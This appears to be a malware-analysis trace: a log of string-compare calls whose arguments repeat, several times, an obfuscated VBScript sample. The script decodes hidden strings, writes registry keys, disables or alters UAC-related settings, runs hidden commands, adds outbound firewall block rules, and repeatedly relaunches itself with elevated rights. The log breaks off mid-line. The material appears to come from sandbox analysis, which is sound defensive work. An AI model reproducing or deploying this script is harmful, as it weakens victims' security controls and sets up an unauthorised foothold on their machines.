bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 101 [0226.368] wcsncmp (_String1="1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 36 [0226.368] wcsncmp (_String1="\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 71 [0226.368] wcsncmp (_String1="\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -3 [0226.369] wcsncmp (_String1="newRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 97 [0226.369] wcsncmp (_String1="ewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite 